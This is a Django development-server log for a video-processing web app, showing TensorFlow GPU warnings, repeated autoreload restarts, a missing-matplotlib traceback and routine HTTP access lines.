Watching for file changes with StatReloader
Performing system checks...

2024-12-15 05:33:10.668664: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 05:33:10.669426: I tensorflow/stream_executor/cuda/cudart_stub.cc:29] Ignore above cudart dlerror if you do not have a GPU set up on your machine.
2024-12-15 05:33:12.524782: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcuda.so.1'; dlerror: libcuda.so.1: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 05:33:12.525098: W tensorflow/stream_executor/cuda/cuda_driver.cc:269] failed call to cuInit: UNKNOWN ERROR (303)
2024-12-15 05:33:12.525217: I tensorflow/stream_executor/cuda/cuda_diagnostics.cc:156] kernel driver does not appear to be running on this host (opensw): /proc/driver/nvidia/version does not exist
2024-12-15 05:33:12.525673: I tensorflow/core/platform/cpu_feature_guard.cc:151] This TensorFlow binary is optimized with oneAPI Deep Neural Network Library (oneDNN) to use the following CPU instructions in performance-critical operations:  AVX2 FMA
To enable them in other operations, rebuild TensorFlow with the appropriate compiler flags.
System check identified no issues (0 silenced).
Error: That port is already in use.
Watching for file changes with StatReloader
Performing system checks...

2024-12-15 10:18:32.372067: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 10:18:32.372121: I tensorflow/stream_executor/cuda/cudart_stub.cc:29] Ignore above cudart dlerror if you do not have a GPU set up on your machine.
2024-12-15 10:18:33.981607: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcuda.so.1'; dlerror: libcuda.so.1: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 10:18:33.981670: W tensorflow/stream_executor/cuda/cuda_driver.cc:269] failed call to cuInit: UNKNOWN ERROR (303)
2024-12-15 10:18:33.981718: I tensorflow/stream_executor/cuda/cuda_diagnostics.cc:156] kernel driver does not appear to be running on this host (opensw): /proc/driver/nvidia/version does not exist
2024-12-15 10:18:33.982079: I tensorflow/core/platform/cpu_feature_guard.cc:151] This TensorFlow binary is optimized with oneAPI Deep Neural Network Library (oneDNN) to use the following CPU instructions in performance-critical operations:  AVX2 FMA
To enable them in other operations, rebuild TensorFlow with the appropriate compiler flags.
System check identified no issues (0 silenced).
December 15, 2024 - 10:18:34
Django version 4.2.16, using settings 'myproject.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.

Watching for file changes with StatReloader
Performing system checks...

2024-12-15 10:18:51.182169: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 10:18:51.182334: I tensorflow/stream_executor/cuda/cudart_stub.cc:29] Ignore above cudart dlerror if you do not have a GPU set up on your machine.
2024-12-15 10:18:52.838141: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcuda.so.1'; dlerror: libcuda.so.1: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 10:18:52.838217: W tensorflow/stream_executor/cuda/cuda_driver.cc:269] failed call to cuInit: UNKNOWN ERROR (303)
2024-12-15 10:18:52.838249: I tensorflow/stream_executor/cuda/cuda_diagnostics.cc:156] kernel driver does not appear to be running on this host (opensw): /proc/driver/nvidia/version does not exist
2024-12-15 10:18:52.838588: I tensorflow/core/platform/cpu_feature_guard.cc:151] This TensorFlow binary is optimized with oneAPI Deep Neural Network Library (oneDNN) to use the following CPU instructions in performance-critical operations:  AVX2 FMA
To enable them in other operations, rebuild TensorFlow with the appropriate compiler flags.
System check identified no issues (0 silenced).
Error: That port is already in use.
[15/Dec/2024 10:18:57] "GET /model_use/ HTTP/1.0" 200 3428
[15/Dec/2024 10:19:06] "POST /process_video/ HTTP/1.0" 200 3651
[15/Dec/2024 10:19:27] "POST /process_video/ HTTP/1.0" 200 3718
/myproject/myproject/views.py changed, reloading.
Watching for file changes with StatReloader
Performing system checks...

2024-12-15 10:20:04.343970: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 10:20:04.344022: I tensorflow/stream_executor/cuda/cudart_stub.cc:29] Ignore above cudart dlerror if you do not have a GPU set up on your machine.
2024-12-15 10:20:05.955465: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcuda.so.1'; dlerror: libcuda.so.1: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 10:20:05.955769: W tensorflow/stream_executor/cuda/cuda_driver.cc:269] failed call to cuInit: UNKNOWN ERROR (303)
2024-12-15 10:20:05.955919: I tensorflow/stream_executor/cuda/cuda_diagnostics.cc:156] kernel driver does not appear to be running on this host (opensw): /proc/driver/nvidia/version does not exist
2024-12-15 10:20:05.956270: I tensorflow/core/platform/cpu_feature_guard.cc:151] This TensorFlow binary is optimized with oneAPI Deep Neural Network Library (oneDNN) to use the following CPU instructions in performance-critical operations:  AVX2 FMA
To enable them in other operations, rebuild TensorFlow with the appropriate compiler flags.
System check identified no issues (0 silenced).
December 15, 2024 - 10:20:06
Django version 4.2.16, using settings 'myproject.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.

/myproject/myproject/views.py changed, reloading.
Watching for file changes with StatReloader
Performing system checks...

2024-12-15 10:22:24.593245: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 10:22:24.593297: I tensorflow/stream_executor/cuda/cudart_stub.cc:29] Ignore above cudart dlerror if you do not have a GPU set up on your machine.
2024-12-15 10:22:26.843820: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcuda.so.1'; dlerror: libcuda.so.1: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 10:22:26.844192: W tensorflow/stream_executor/cuda/cuda_driver.cc:269] failed call to cuInit: UNKNOWN ERROR (303)
2024-12-15 10:22:26.844263: I tensorflow/stream_executor/cuda/cuda_diagnostics.cc:156] kernel driver does not appear to be running on this host (opensw): /proc/driver/nvidia/version does not exist
2024-12-15 10:22:26.844639: I tensorflow/core/platform/cpu_feature_guard.cc:151] This TensorFlow binary is optimized with oneAPI Deep Neural Network Library (oneDNN) to use the following CPU instructions in performance-critical operations:  AVX2 FMA
To enable them in other operations, rebuild TensorFlow with the appropriate compiler flags.
System check identified no issues (0 silenced).
December 15, 2024 - 10:22:27
Django version 4.2.16, using settings 'myproject.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.

/myproject/myproject/views.py changed, reloading.
Watching for file changes with StatReloader
Performing system checks...

2024-12-15 10:22:31.600741: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 10:22:31.600795: I tensorflow/stream_executor/cuda/cudart_stub.cc:29] Ignore above cudart dlerror if you do not have a GPU set up on your machine.
2024-12-15 10:22:33.207854: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcuda.so.1'; dlerror: libcuda.so.1: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 10:22:33.208042: W tensorflow/stream_executor/cuda/cuda_driver.cc:269] failed call to cuInit: UNKNOWN ERROR (303)
2024-12-15 10:22:33.208123: I tensorflow/stream_executor/cuda/cuda_diagnostics.cc:156] kernel driver does not appear to be running on this host (opensw): /proc/driver/nvidia/version does not exist
2024-12-15 10:22:33.208500: I tensorflow/core/platform/cpu_feature_guard.cc:151] This TensorFlow binary is optimized with oneAPI Deep Neural Network Library (oneDNN) to use the following CPU instructions in performance-critical operations:  AVX2 FMA
To enable them in other operations, rebuild TensorFlow with the appropriate compiler flags.
System check identified no issues (0 silenced).
December 15, 2024 - 10:22:33
Django version 4.2.16, using settings 'myproject.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.

/myproject/myproject/views.py changed, reloading.
Watching for file changes with StatReloader
Performing system checks...

2024-12-15 10:25:51.195905: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 10:25:51.196169: I tensorflow/stream_executor/cuda/cudart_stub.cc:29] Ignore above cudart dlerror if you do not have a GPU set up on your machine.
2024-12-15 10:25:52.823071: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcuda.so.1'; dlerror: libcuda.so.1: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 10:25:52.823459: W tensorflow/stream_executor/cuda/cuda_driver.cc:269] failed call to cuInit: UNKNOWN ERROR (303)
2024-12-15 10:25:52.823644: I tensorflow/stream_executor/cuda/cuda_diagnostics.cc:156] kernel driver does not appear to be running on this host (opensw): /proc/driver/nvidia/version does not exist
2024-12-15 10:25:52.824282: I tensorflow/core/platform/cpu_feature_guard.cc:151] This TensorFlow binary is optimized with oneAPI Deep Neural Network Library (oneDNN) to use the following CPU instructions in performance-critical operations:  AVX2 FMA
To enable them in other operations, rebuild TensorFlow with the appropriate compiler flags.
System check identified no issues (0 silenced).
December 15, 2024 - 10:25:53
Django version 4.2.16, using settings 'myproject.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.

[15/Dec/2024 10:26:00] "GET / HTTP/1.0" 200 2347
[15/Dec/2024 10:26:02] "GET /model_use/ HTTP/1.0" 200 3428
[15/Dec/2024 10:26:13] "POST /process_video/ HTTP/1.0" 200 3638
[15/Dec/2024 11:01:22] "GET /model_use/ HTTP/1.0" 200 3428
[15/Dec/2024 11:01:48] "GET /model_use/ HTTP/1.0" 200 3428
[15/Dec/2024 11:01:51] "GET /model_use/ HTTP/1.0" 200 3428
[15/Dec/2024 11:01:53] "GET /model_use/ HTTP/1.0" 200 3428
Watching for file changes with StatReloader
Performing system checks...

2024-12-15 11:02:59.381462: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 11:02:59.381522: I tensorflow/stream_executor/cuda/cudart_stub.cc:29] Ignore above cudart dlerror if you do not have a GPU set up on your machine.
2024-12-15 11:03:01.033901: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcuda.so.1'; dlerror: libcuda.so.1: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 11:03:01.034256: W tensorflow/stream_executor/cuda/cuda_driver.cc:269] failed call to cuInit: UNKNOWN ERROR (303)
2024-12-15 11:03:01.034321: I tensorflow/stream_executor/cuda/cuda_diagnostics.cc:156] kernel driver does not appear to be running on this host (opensw): /proc/driver/nvidia/version does not exist
2024-12-15 11:03:01.034661: I tensorflow/core/platform/cpu_feature_guard.cc:151] This TensorFlow binary is optimized with oneAPI Deep Neural Network Library (oneDNN) to use the following CPU instructions in performance-critical operations:  AVX2 FMA
To enable them in other operations, rebuild TensorFlow with the appropriate compiler flags.
System check identified no issues (0 silenced).
December 15, 2024 - 11:03:01
Django version 4.2.16, using settings 'myproject.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.

[15/Dec/2024 11:03:02] "GET /model_use/ HTTP/1.0" 200 3428
[15/Dec/2024 11:03:03] "GET /model_use/ HTTP/1.0" 200 3428
[15/Dec/2024 11:03:03] "GET /model_use/ HTTP/1.0" 200 3428
[15/Dec/2024 11:03:03] "GET / HTTP/1.0" 200 2347
[15/Dec/2024 11:03:05] "GET /model_use/ HTTP/1.0" 200 3428
[15/Dec/2024 11:03:06] "GET /model_use/ HTTP/1.0" 200 3428
[15/Dec/2024 11:03:06] "GET /model_use/ HTTP/1.0" 200 3428
[15/Dec/2024 11:04:01] "GET /model_use/ HTTP/1.0" 200 3418
[15/Dec/2024 11:04:16] "POST /process_video/ HTTP/1.0" 200 3641
[15/Dec/2024 11:05:33] "GET /model_types/ HTTP/1.0" 200 5637
[15/Dec/2024 11:06:01] "GET /model_types/ HTTP/1.0" 200 5251
[15/Dec/2024 11:06:14] "GET /model_types/ HTTP/1.0" 200 5263
[15/Dec/2024 11:07:07] "GET /model_types/ HTTP/1.0" 200 5408
[15/Dec/2024 11:07:33] "GET /model_comparison/ HTTP/1.0" 200 773
[15/Dec/2024 11:07:34] "GET /model_types/ HTTP/1.0" 200 5408
Not Found: /onvif/device_service
[15/Dec/2024 11:14:41] "POST /onvif/device_service HTTP/1.0" 404 2928
[15/Dec/2024 11:14:59] "GET /model_comparison/ HTTP/1.0" 200 773
[15/Dec/2024 11:25:43] "GET /process_video/ HTTP/1.0" 200 3418
[15/Dec/2024 11:41:44] "GET / HTTP/1.0" 200 2347
/myproject/myproject/views.py changed, reloading.
Watching for file changes with StatReloader
Performing system checks...

2024-12-15 11:45:13.558931: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 11:45:13.558981: I tensorflow/stream_executor/cuda/cudart_stub.cc:29] Ignore above cudart dlerror if you do not have a GPU set up on your machine.
2024-12-15 11:45:15.252404: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcuda.so.1'; dlerror: libcuda.so.1: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 11:45:15.252580: W tensorflow/stream_executor/cuda/cuda_driver.cc:269] failed call to cuInit: UNKNOWN ERROR (303)
2024-12-15 11:45:15.252673: I tensorflow/stream_executor/cuda/cuda_diagnostics.cc:156] kernel driver does not appear to be running on this host (opensw): /proc/driver/nvidia/version does not exist
2024-12-15 11:45:15.253083: I tensorflow/core/platform/cpu_feature_guard.cc:151] This TensorFlow binary is optimized with oneAPI Deep Neural Network Library (oneDNN) to use the following CPU instructions in performance-critical operations:  AVX2 FMA
To enable them in other operations, rebuild TensorFlow with the appropriate compiler flags.
Exception in thread django-main-thread:
Traceback (most recent call last):
  File "/usr/lib/python3.8/threading.py", line 932, in _bootstrap_inner
    self.run()
  File "/usr/lib/python3.8/threading.py", line 870, in run
    self._target(*self._args, **self._kwargs)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/autoreload.py", line 64, in wrapper
    fn(*args, **kwargs)
  File "/usr/local/lib/python3.8/dist-packages/django/core/management/commands/runserver.py", line 133, in inner_run
    self.check(display_num_errors=True)
  File "/usr/local/lib/python3.8/dist-packages/django/core/management/base.py", line 485, in check
    all_issues = checks.run_checks(
  File "/usr/local/lib/python3.8/dist-packages/django/core/checks/registry.py", line 88, in run_checks
    new_errors = check(app_configs=app_configs, databases=databases)
  File "/usr/local/lib/python3.8/dist-packages/django/core/checks/urls.py", line 14, in check_url_config
    return check_resolver(resolver)
  File "/usr/local/lib/python3.8/dist-packages/django/core/checks/urls.py", line 24, in check_resolver
    return check_method()
  File "/usr/local/lib/python3.8/dist-packages/django/urls/resolvers.py", line 494, in check
    for pattern in self.url_patterns:
  File "/usr/local/lib/python3.8/dist-packages/django/utils/functional.py", line 57, in __get__
    res = instance.__dict__[self.name] = self.func(instance)
  File "/usr/local/lib/python3.8/dist-packages/django/urls/resolvers.py", line 715, in url_patterns
    patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/functional.py", line 57, in __get__
    res = instance.__dict__[self.name] = self.func(instance)
  File "/usr/local/lib/python3.8/dist-packages/django/urls/resolvers.py", line 708, in urlconf_module
    return import_module(self.urlconf_name)
  File "/usr/lib/python3.8/importlib/__init__.py", line 127, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 1014, in _gcd_import
  File "<frozen importlib._bootstrap>", line 991, in _find_and_load
  File "<frozen importlib._bootstrap>", line 975, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 671, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 848, in exec_module
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "/myproject/myproject/urls.py", line 21, in <module>
    from .views import process_video
  File "/myproject/myproject/views.py", line 15, in <module>
    import matplotlib.pyplot as plt
ModuleNotFoundError: No module named 'matplotlib'
Watching for file changes with StatReloader
Performing system checks...

2024-12-15 11:46:54.974588: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 11:46:54.974641: I tensorflow/stream_executor/cuda/cudart_stub.cc:29] Ignore above cudart dlerror if you do not have a GPU set up on your machine.
2024-12-15 11:46:56.599951: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcuda.so.1'; dlerror: libcuda.so.1: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 11:46:56.600020: W tensorflow/stream_executor/cuda/cuda_driver.cc:269] failed call to cuInit: UNKNOWN ERROR (303)
2024-12-15 11:46:56.600055: I tensorflow/stream_executor/cuda/cuda_diagnostics.cc:156] kernel driver does not appear to be running on this host (opensw): /proc/driver/nvidia/version does not exist
2024-12-15 11:46:56.600397: I tensorflow/core/platform/cpu_feature_guard.cc:151] This TensorFlow binary is optimized with oneAPI Deep Neural Network Library (oneDNN) to use the following CPU instructions in performance-critical operations:  AVX2 FMA
To enable them in other operations, rebuild TensorFlow with the appropriate compiler flags.
System check identified no issues (0 silenced).
December 15, 2024 - 11:46:57
Django version 4.2.16, using settings 'myproject.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.

[15/Dec/2024 11:46:58] "GET / HTTP/1.0" 200 2347
[15/Dec/2024 11:46:59] "GET /model_use/ HTTP/1.0" 200 3432
[15/Dec/2024 11:47:08] "POST /process_video/ HTTP/1.0" 200 3752
/myproject/myproject/views.py changed, reloading.
Watching for file changes with StatReloader
Performing system checks...

2024-12-15 11:52:18.067359: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 11:52:18.067418: I tensorflow/stream_executor/cuda/cudart_stub.cc:29] Ignore above cudart dlerror if you do not have a GPU set up on your machine.
2024-12-15 11:52:19.696550: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcuda.so.1'; dlerror: libcuda.so.1: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 11:52:19.696617: W tensorflow/stream_executor/cuda/cuda_driver.cc:269] failed call to cuInit: UNKNOWN ERROR (303)
2024-12-15 11:52:19.696653: I tensorflow/stream_executor/cuda/cuda_diagnostics.cc:156] kernel driver does not appear to be running on this host (opensw): /proc/driver/nvidia/version does not exist
2024-12-15 11:52:19.697018: I tensorflow/core/platform/cpu_feature_guard.cc:151] This TensorFlow binary is optimized with oneAPI Deep Neural Network Library (oneDNN) to use the following CPU instructions in performance-critical operations:  AVX2 FMA
To enable them in other operations, rebuild TensorFlow with the appropriate compiler flags.
System check identified no issues (0 silenced).
December 15, 2024 - 11:52:20
Django version 4.2.16, using settings 'myproject.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.

Watching for file changes with StatReloader
Performing system checks...

2024-12-15 11:52:34.237960: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 11:52:34.238096: I tensorflow/stream_executor/cuda/cudart_stub.cc:29] Ignore above cudart dlerror if you do not have a GPU set up on your machine.
2024-12-15 11:52:35.909148: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcuda.so.1'; dlerror: libcuda.so.1: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 11:52:35.909228: W tensorflow/stream_executor/cuda/cuda_driver.cc:269] failed call to cuInit: UNKNOWN ERROR (303)
2024-12-15 11:52:35.909269: I tensorflow/stream_executor/cuda/cuda_diagnostics.cc:156] kernel driver does not appear to be running on this host (opensw): /proc/driver/nvidia/version does not exist
2024-12-15 11:52:35.909686: I tensorflow/core/platform/cpu_feature_guard.cc:151] This TensorFlow binary is optimized with oneAPI Deep Neural Network Library (oneDNN) to use the following CPU instructions in performance-critical operations:  AVX2 FMA
To enable them in other operations, rebuild TensorFlow with the appropriate compiler flags.
System check identified no issues (0 silenced).
December 15, 2024 - 11:52:36
Django version 4.2.16, using settings 'myproject.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.

Watching for file changes with StatReloader
Performing system checks...

2024-12-15 11:52:38.074962: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 11:52:38.075143: I tensorflow/stream_executor/cuda/cudart_stub.cc:29] Ignore above cudart dlerror if you do not have a GPU set up on your machine.
2024-12-15 11:52:39.940747: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcuda.so.1'; dlerror: libcuda.so.1: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 11:52:39.940810: W tensorflow/stream_executor/cuda/cuda_driver.cc:269] failed call to cuInit: UNKNOWN ERROR (303)
2024-12-15 11:52:39.940845: I tensorflow/stream_executor/cuda/cuda_diagnostics.cc:156] kernel driver does not appear to be running on this host (opensw): /proc/driver/nvidia/version does not exist
2024-12-15 11:52:39.941220: I tensorflow/core/platform/cpu_feature_guard.cc:151] This TensorFlow binary is optimized with oneAPI Deep Neural Network Library (oneDNN) to use the following CPU instructions in performance-critical operations:  AVX2 FMA
To enable them in other operations, rebuild TensorFlow with the appropriate compiler flags.
System check identified no issues (0 silenced).
Error: That port is already in use.
Watching for file changes with StatReloader
Performing system checks...

2024-12-15 11:53:06.770363: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 11:53:06.770533: I tensorflow/stream_executor/cuda/cudart_stub.cc:29] Ignore above cudart dlerror if you do not have a GPU set up on your machine.
2024-12-15 11:53:08.701842: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcuda.so.1'; dlerror: libcuda.so.1: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 11:53:08.701944: W tensorflow/stream_executor/cuda/cuda_driver.cc:269] failed call to cuInit: UNKNOWN ERROR (303)
2024-12-15 11:53:08.701995: I tensorflow/stream_executor/cuda/cuda_diagnostics.cc:156] kernel driver does not appear to be running on this host (opensw): /proc/driver/nvidia/version does not exist
2024-12-15 11:53:08.702390: I tensorflow/core/platform/cpu_feature_guard.cc:151] This TensorFlow binary is optimized with oneAPI Deep Neural Network Library (oneDNN) to use the following CPU instructions in performance-critical operations:  AVX2 FMA
To enable them in other operations, rebuild TensorFlow with the appropriate compiler flags.
Watching for file changes with StatReloader
Performing system checks...

2024-12-15 11:53:09.676576: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 11:53:09.677011: I tensorflow/stream_executor/cuda/cudart_stub.cc:29] Ignore above cudart dlerror if you do not have a GPU set up on your machine.
System check identified no issues (0 silenced).
December 15, 2024 - 11:53:09
Django version 4.2.16, using settings 'myproject.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.

2024-12-15 11:53:11.697915: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcuda.so.1'; dlerror: libcuda.so.1: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 11:53:11.698026: W tensorflow/stream_executor/cuda/cuda_driver.cc:269] failed call to cuInit: UNKNOWN ERROR (303)
2024-12-15 11:53:11.698070: I tensorflow/stream_executor/cuda/cuda_diagnostics.cc:156] kernel driver does not appear to be running on this host (opensw): /proc/driver/nvidia/version does not exist
2024-12-15 11:53:11.698428: I tensorflow/core/platform/cpu_feature_guard.cc:151] This TensorFlow binary is optimized with oneAPI Deep Neural Network Library (oneDNN) to use the following CPU instructions in performance-critical operations:  AVX2 FMA
To enable them in other operations, rebuild TensorFlow with the appropriate compiler flags.
System check identified no issues (0 silenced).
Error: That port is already in use.
[15/Dec/2024 11:53:20] "GET / HTTP/1.0" 200 2347
[15/Dec/2024 11:53:21] "GET /model_use/ HTTP/1.0" 200 3432
[15/Dec/2024 11:53:29] "POST /process_video/ HTTP/1.0" 200 3702
/myproject/myproject/views.py changed, reloading.
Watching for file changes with StatReloader
Performing system checks...

2024-12-15 11:54:12.589572: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 11:54:12.589627: I tensorflow/stream_executor/cuda/cudart_stub.cc:29] Ignore above cudart dlerror if you do not have a GPU set up on your machine.
2024-12-15 11:54:14.238541: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcuda.so.1'; dlerror: libcuda.so.1: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 11:54:14.238607: W tensorflow/stream_executor/cuda/cuda_driver.cc:269] failed call to cuInit: UNKNOWN ERROR (303)
2024-12-15 11:54:14.238642: I tensorflow/stream_executor/cuda/cuda_diagnostics.cc:156] kernel driver does not appear to be running on this host (opensw): /proc/driver/nvidia/version does not exist
2024-12-15 11:54:14.239045: I tensorflow/core/platform/cpu_feature_guard.cc:151] This TensorFlow binary is optimized with oneAPI Deep Neural Network Library (oneDNN) to use the following CPU instructions in performance-critical operations:  AVX2 FMA
To enable them in other operations, rebuild TensorFlow with the appropriate compiler flags.
System check identified no issues (0 silenced).
December 15, 2024 - 11:54:14
Django version 4.2.16, using settings 'myproject.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.

[15/Dec/2024 11:54:17] "GET /model_use/ HTTP/1.0" 200 3432
[15/Dec/2024 11:54:26] "POST /process_video/ HTTP/1.0" 200 3663
/myproject/myproject/views.py changed, reloading.
Watching for file changes with StatReloader
Performing system checks...

